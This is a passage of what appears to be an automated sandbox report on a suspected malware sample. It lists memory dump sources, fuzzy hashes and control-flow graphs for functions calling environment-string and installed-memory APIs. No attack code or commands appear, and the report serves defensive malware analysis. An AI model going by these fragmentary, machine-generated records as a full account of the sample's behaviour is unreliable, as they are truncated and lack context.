                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 8bfd55fa9a3783dde79afca9779d4b7cf76278c514d5c7b39b661a11ebe4b8a8
                                                      • Instruction ID: f65fe3a5b60e5d3733474b4962cbff60dd92034f6aca3bb1e52e6538901e1fc9
                                                      • Opcode Fuzzy Hash: 8bfd55fa9a3783dde79afca9779d4b7cf76278c514d5c7b39b661a11ebe4b8a8
                                                      • Instruction Fuzzy Hash: 36E0B675508212EFEA05DF45C14061EF7E6BFC4B14F55C88DE88873204C7B4AD45DA52
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: E&eb
                                                      • API String ID: 0-175690455
                                                      • Opcode ID: 199449d1e260cc746fff3af5b00313affdd534bf9bcbdda333d2416edb5c6059
                                                      • Instruction ID: ede347143b412031cb706c53c7ae6bef58734e760a45c23513f63fa45a031561
                                                      • Opcode Fuzzy Hash: 199449d1e260cc746fff3af5b00313affdd534bf9bcbdda333d2416edb5c6059
                                                      • Instruction Fuzzy Hash: 7B31B1B2600B818BC725DF76C885A67B3E2EF89310F18896DD0AAC7751E735F9428740
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: onqp
                                                      • API String ID: 0-1718216680
                                                      • Opcode ID: e063445abfb55a633e1e646786d3aaad270a08a658c65ba58cf8cf77b962cefa
                                                      • Instruction ID: 631371bee423bfb92f4c28a6ef3fd1688048dbb211e64243d6dad20fd76bf71a
                                                      • Opcode Fuzzy Hash: e063445abfb55a633e1e646786d3aaad270a08a658c65ba58cf8cf77b962cefa
                                                      • Instruction Fuzzy Hash: 1821BF742183819FD32CCF05C8A07AFB7E2EFC6708F54581CE5928B381CBB599428B96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 445708c4425e7fbe0e82e000bf8776f78de902c4ab3728a653e76f40feb93781
                                                      • Instruction ID: 9792daa894c821c3352719ee80c4679cdc08d7c2d1ebe24bda617e2eb5d284c6
                                                      • Opcode Fuzzy Hash: 445708c4425e7fbe0e82e000bf8776f78de902c4ab3728a653e76f40feb93781
                                                      • Instruction Fuzzy Hash: D3E177B4500B058FE3248F25C894B67B7E5FB49704F14892CD5A687BA2EB35F916CB60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: b700de49b4de166f54597e8d52469cdfce65e9b3d56e2f5b1e8bb220b178004e
                                                      • Instruction ID: 8072247a4f8b4b8bed8b356507bca7043932d7e2f5752e821cddf84c0af95f9b
                                                      • Opcode Fuzzy Hash: b700de49b4de166f54597e8d52469cdfce65e9b3d56e2f5b1e8bb220b178004e
                                                      • Instruction Fuzzy Hash: B3C1F0B1A083458BD354CF18C89072BB7E2EB94724F288A2DFAD587382D775D945CB93
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6c18637f3c995bb1487a6f614b46710b5d803b1c49cef33c5b9826c057238b56
                                                      • Instruction ID: 027645b0e93cc2c1de396247a604ef52301659d11cb2ccbc4acf156a63c50dd5
                                                      • Opcode Fuzzy Hash: 6c18637f3c995bb1487a6f614b46710b5d803b1c49cef33c5b9826c057238b56
                                                      • Instruction Fuzzy Hash: C6A17D706007019FE728CF29C894B27B7E5FB49704F14891CE5AA8BB91DB75F905CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 9e78d02ffb2c2bec516e5604ec463c75621d586c5a71974063530a57d46fefae
                                                      • Instruction ID: 5d334286bacd57039785e69f9108c1226d898937ccff8c63a86acae80bcfbdae
                                                      • Opcode Fuzzy Hash: 9e78d02ffb2c2bec516e5604ec463c75621d586c5a71974063530a57d46fefae
                                                      • Instruction Fuzzy Hash: D8819C70A083029BE314CF18C494B2BBBE5FFC5758F28891CE4895B392D775DA45CBA6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5713106688e3166a26b18d427aa6031de51e12290ecdc156417a6a2ea846646e
                                                      • Instruction ID: 68af78a21b4ce6492accf7eec85546cdefba82cef68bb7542c06a6925f35bc71
                                                      • Opcode Fuzzy Hash: 5713106688e3166a26b18d427aa6031de51e12290ecdc156417a6a2ea846646e
                                                      • Instruction Fuzzy Hash: 71516874200B118BC724CF28C861B62B3F1FF46318F148A4CD9968B7A1DB75B955CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 81605b9ac1517a00ce4dea56618948cf99ff8f590b7bb2f04c29f3f4015aebb6
                                                      • Instruction ID: c482e7bc4c7de09e896a984e834fb3acc67c2defb81a5fab598ae03a5af86586
                                                      • Opcode Fuzzy Hash: 81605b9ac1517a00ce4dea56618948cf99ff8f590b7bb2f04c29f3f4015aebb6
                                                      • Instruction Fuzzy Hash: 18417AB59083988BC324EF66D8C077AF7E8EFA5314F094228E8A987391E771DD05C352
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8fcff4009406288a4ba0ee5154cc009e298a66086a2f585a91ae73fad3ca1715
                                                      • Instruction ID: 58c35b6993b8c22add796a4bfedcea5950fbad45512d1e560ff700d727615152
                                                      • Opcode Fuzzy Hash: 8fcff4009406288a4ba0ee5154cc009e298a66086a2f585a91ae73fad3ca1715
                                                      • Instruction Fuzzy Hash: C94168705083029BE708CF08D594B2BB7E6FBD5708F58891CE8898B285D735DD069FA6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1b1ac33913044ee3ec3cec3b2ab7674167d0d60326ee487b391e80f6cd3509f1
                                                      • Instruction ID: 5432009bb8659602a4fd54a2a4abfa7e30917b09360003279b9d12c879662748
                                                      • Opcode Fuzzy Hash: 1b1ac33913044ee3ec3cec3b2ab7674167d0d60326ee487b391e80f6cd3509f1
                                                      • Instruction Fuzzy Hash: AF214D706083429BE310CF04D994B1FB7E6BBC1708F288A1CE5989B3D5C775EC059BA6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 241 ced690-ced70e 242 ced746-ced789 RtlExpandEnvironmentStrings 241->242 243 ced710-ced744 241->243 244 ced78b-ced790 242->244 245 ced792 242->245 243->242 243->243 246 ced795-ced827 call d03b50 RtlExpandEnvironmentStrings 244->246 245->246 249 ced879-ced8af 246->249 250 ced829 246->250 252 ced8b8-ced8bd 249->252 253 ced8b1-ced8b6 249->253 251 ced830-ced877 250->251 251->249 251->251 254 ced8c0-ced8d1 call d03b50 252->254 253->254 257 ced8d3-ced8d8 254->257 258 ced8f1-ced901 254->258 259 ced8e0-ced8ef 257->259 260 ced903-ced90a 258->260 261 ced921-ced932 call d08d50 258->261 259->258 259->259 262 ced910-ced91f 260->262 264 ced937-ced954 261->264 262->261 262->262
                                                      APIs
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 00CED77D
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 00CED7A8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentExpandStrings
                                                      • String ID: -^$AV$SE$X&
                                                      • API String ID: 237503144-3017178743
                                                      • Opcode ID: 1d7352be5942b97815b7896703b6add07ab01afd8504772793b49d8904b7a94e
                                                      • Instruction ID: fe3072ad0373d884b4fac974b677dfffef9d18395bb7b6bb3418869acba33bf6
                                                      • Opcode Fuzzy Hash: 1d7352be5942b97815b7896703b6add07ab01afd8504772793b49d8904b7a94e
                                                      • Instruction Fuzzy Hash: 62718B702083918FE724CF15D8A0B9BB7E1EFC6314F114A1CE8EA5B280D7749A45CBA3
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 265 ce4950-ce4964 266 ce4970-ce4978 265->266 266->266 267 ce497a-ce49ac RtlExpandEnvironmentStrings 266->267 268 ce49ae-ce49b3 267->268 269 ce49b5 267->269 270 ce49b8-ce4a4c call d03b50 RtlExpandEnvironmentStrings 268->270 269->270 273 ce4a4e-ce4a4f 270->273 274 ce4a93-ce4ac3 270->274 275 ce4a50-ce4a91 273->275 276 ce4acc-ce4ace 274->276 277 ce4ac5-ce4aca 274->277 275->274 275->275 278 ce4ad1-ce4ae8 call d03b50 276->278 277->278 281 ce4aea-ce4af3 278->281 282 ce4b11-ce4b21 278->282 283 ce4b00-ce4b0f 281->283 284 ce4b23-ce4b2a 282->284 285 ce4b41-ce4b55 call d08ba0 282->285 283->282 283->283 287 ce4b30-ce4b3f 284->287 288 ce4b5a-ce4b76 285->288 287->285 287->287
                                                      APIs
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 00CE499D
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 00CE49CE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentExpandStrings
                                                      • String ID: 2M#O$<Y.[$r]Nm$qrs
                                                      • API String ID: 237503144-2765572984
                                                      • Opcode ID: 3f04f177ebc8e22e569ba9af46659ea4f905b1adc3a2692fdd5d4ffede23d6b3
                                                      • Instruction ID: b62e9ff74aae468f00a6fbefa60e57370218db9b0fb2593f4fdb1476a2f1ee0a
                                                      • Opcode Fuzzy Hash: 3f04f177ebc8e22e569ba9af46659ea4f905b1adc3a2692fdd5d4ffede23d6b3
                                                      • Instruction Fuzzy Hash: F251C0746183819BD324CF15C895BABB7E5EF86324F054A2CF9958B381E7B49901CBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 382 cf4af5-cf4b44 383 cf4b89-cf4b92 382->383 384 cf4b46 382->384 386 cf4bab-cf4ffd 383->386 387 cf4b94-cf4b9a 383->387 385 cf4b50-cf4b87 384->385 385->383 385->385 390 cf4fff 386->390 391 cf5039-cf5042 386->391 388 cf4ba0-cf4ba9 387->388 388->386 388->388 392 cf5000-cf5037 390->392 393 cf505b-cf5065 call d01cd0 391->393 394 cf5044-cf504a 391->394 392->391 392->392 397 cf506a-cf5076 393->397 395 cf5050-cf5059 394->395 395->393 395->395 398 cf508b-cf50b0 call d08070 397->398 399 cf5078-cf507f 397->399 402 cf50b5-cf50d8 GetPhysicallyInstalledSystemMemory 398->402 400 cf5080-cf5089 399->400 400->398 400->400 403 cf512e-cf513b 402->403 404 cf50da-cf50e3 402->404 407 cf5153-cf51b9 403->407 405 cf513d-cf5142 404->405 406 cf50e5 404->406 409 cf5144-cf5150 405->409 410 cf5121-cf512c 405->410 408 cf50f0-cf511a 406->408 411 cf51bb 407->411 412 cf5203-cf5255 407->412 408->408 415 cf511c-cf511f 408->415 409->407 410->407 416 cf51c0-cf5201 411->416 413 cf52a7-cf52ad 412->413 414 cf5257 412->414 418 cf52af-cf52b2 413->418 419 cf52cb-cf52d3 413->419 417 cf5260-cf52a5 414->417 415->409 415->410 416->412 416->416 417->413 417->417 420 cf52c0-cf52c9 418->420 421 cf52eb-cf52f7 419->421 422 cf52d5-cf52d6 419->422 420->419 420->420 424 cf530b-cf53a2 421->424 425 cf52f9-cf52ff 421->425 423 cf52e0-cf52e9 422->423 423->421 423->423 427 cf53a4 424->427 428 cf53e3-cf53ec 424->428 426 cf5300-cf5309 425->426 426->424 426->426 429 cf53b0-cf53e1 427->429 430 cf53ee-cf53f4 428->430 431 cf540b-cf5417 428->431 429->428 429->429 432 cf5400-cf5409 430->432 433 cf542b-cf54cc 431->433 434 cf5419-cf541f 431->434 432->431 432->432 435 cf5420-cf5429 434->435 435->433 435->435
                                                      APIs
                                                      • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 00CF50BF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                      • Associated: 00000000.00000002.1749473718.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749572738.0000000000D0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749592050.0000000000D19000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749619491.0000000000D3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1749640450.0000000000D44000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1750412602.00000000015C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_cd0000_file.jbxd
                                                      Similarity
                                                      • API ID: InstalledMemoryPhysicallySystem
                                                      • String ID: M:h:$P6D+$hFt=
                                                      • API String ID: 3960555810-4191368970
                                                      • Opcode ID: 79f78e85ae4c553e719b92ef677eea93153830992eae0a7db37070bf960cf3e3
                                                      • Instruction ID: 6ca1358bcdd0c48339793fadd789451606d51939ebf6ab251675d4c5c4ef8046
                                                      • Opcode Fuzzy Hash: 79f78e85ae4c553e719b92ef677eea93153830992eae0a7db37070bf960cf3e3
                                                      • Instruction Fuzzy Hash: AEF16D70504F828BD7268F35C4687E7BBE1AF16308F44496DC2FB8B692C779A506CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 436 cf4f8f-cf4ffd call cfc4d0 call cd8700 442 cf4fff 436->442 443 cf5039-cf5042 436->443 444 cf5000-cf5037 442->444 445 cf505b-cf5076 call d01cd0 443->445 446 cf5044-cf504a 443->446 444->443 444->444 450 cf508b-cf50d8 call d08070 GetPhysicallyInstalledSystemMemory 445->450 451 cf5078-cf507f 445->451 447 cf5050-cf5059 446->447 447->445 447->447 455 cf512e-cf513b 450->455 456 cf50da-cf50e3 450->456 452 cf5080-cf5089 451->452 452->450 452->452 459 cf5153-cf51b9 455->459 457 cf513d-cf5142 456->457 458 cf50e5 456->458 461 cf5144-cf5150 457->461 462 cf5121-cf512c 457->462 460 cf50f0-cf511a 458->460 463 cf51bb 459->463 464 cf5203-cf5255 459->464 460->460 467 cf511c-cf511f 460->467 461->459 462->459 468 cf51c0-cf5201 463->468 465 cf52a7-cf52ad 464->465 466 cf5257 464->466 470 cf52af-cf52b2 465->470 471 cf52cb-cf52d3 465->471 469 cf5260-cf52a5 466->469 467->461 467->462 468->464 468->468 469->465 469->469 472 cf52c0-cf52c9 470->472 473 cf52eb-cf52f7 471->473 474 cf52d5-cf52d6 471->474 472->471 472->472 476 cf530b-cf53a2 473->476 477 cf52f9-cf52ff 473->477 475 cf52e0-cf52e9 474->475 475->473 475->475 479 cf53a4 476->479 480 cf53e3-cf53ec 476->480 478 cf5300-cf5309 477->478 478->476 478->478 481 cf53b0-cf53e1 479->481 482 cf53ee-cf53f4 480->482 483 cf540b-cf5417 480->483 481->480 481->481 484 cf5400-cf5409 482->484 485 cf542b-cf54cc 483->485 486 cf5419-cf541f 483->486 484->483 484->484 487 cf5420-cf5429 486->487 487->485 487->487
                                                      APIs
                                                      • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 00CF50BF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1749519596.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
